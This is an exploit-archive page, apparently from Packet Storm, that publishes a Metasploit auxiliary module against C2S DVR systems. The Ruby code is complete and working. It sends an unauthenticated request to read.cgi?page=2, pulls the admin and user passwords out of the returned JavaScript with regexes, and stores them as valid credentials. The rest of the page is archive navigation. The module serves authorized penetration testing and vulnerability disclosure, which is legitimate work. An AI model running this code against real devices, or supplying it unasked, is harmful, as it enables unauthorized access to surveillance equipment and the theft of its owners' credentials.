C2S DVR Management Password Disclosure

C2S DVR Management Password Disclosure: Posted Aug 31, 2024; Authored by h00die, Yakir Wizman | Site metasploit.com; C2S DVR allows an unauthenticated user to disclose the username and password by requesting the javascript page read.cgi?page=2. This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.; tags | exploit, cgi, javascript; SHA-256 | f14eb376c1dcefd1b99e4b5370da22899ba91385ab2b1509b470c463d912db0f; Download | Favorite | View

C2S DVR Management Password Disclosure

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'         => 'C2S DVR Management Password Disclosure',
      'Description'  => %q{
        C2S DVR allows an unauthenticated user to disclose the username
        & password by requesting the javascript page 'read.cgi?page=2'.
        This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
      },
      'References'   => [['EDB', '40265']],
      'Author'       =>
        [
          'Yakir Wizman', # discovery
          'h00die',    # module
        ],
      'License'      => MSF_LICENSE,
      'DisclosureDate' => 'Aug 19 2016'
    )

    register_options([
      OptString.new('TARGETURI', [false, 'URL of the C2S DVR root', '/'])
    ])
  end

  def run_host(rhost)
    begin
      url = normalize_uri(datastore['TARGETURI'], 'cgi-bin', 'read.cgi')
      vprint_status("Attempting to load data from #{url}?page=2")
      res = send_request_cgi({
        'uri'      => url,
        'vars_get' => {'page'=>'2'}
      })
      unless res
        print_error("#{peer} Unable to connect to #{url}")
        return
      end

      unless res.body.include?('pw_enflag')
        print_error("Invalid response received for #{peer} for #{url}")
        return
      end

      if res.body =~ /pw_adminpw = "(.+?)";/
        print_good("Found: admin:#{$1}")
        store_valid_credential(
          user:         'admin',
          private:      $1,
          private_type: :password
        )
      end

      if res.body =~ /pw_userpw = "(.+?)";/
        print_good("Found: user:#{$1}")
        store_valid_credential(
          user:         'user',
          private:      $1,
          private_type: :password
        )
      end
    rescue ::Rex::ConnectionError
      print_error("#{peer} Unable to connect to site")
      return
    end
  end
end

Top Authors In Last 30 Days

Red Hat 223 files
Ubuntu 57 files
LiquidWorm 23 files
Debian 19 files
indoushka 15 files
Apple 9 files
Google Security Research 5 files
Gentoo 5 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,158)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,830)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,245)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

C2S DVR Management Password Disclosure

C2S DVR Management Password Disclosure

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

C2S DVR Management Password Disclosure

Share This

C2S DVR Management Password Disclosure

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems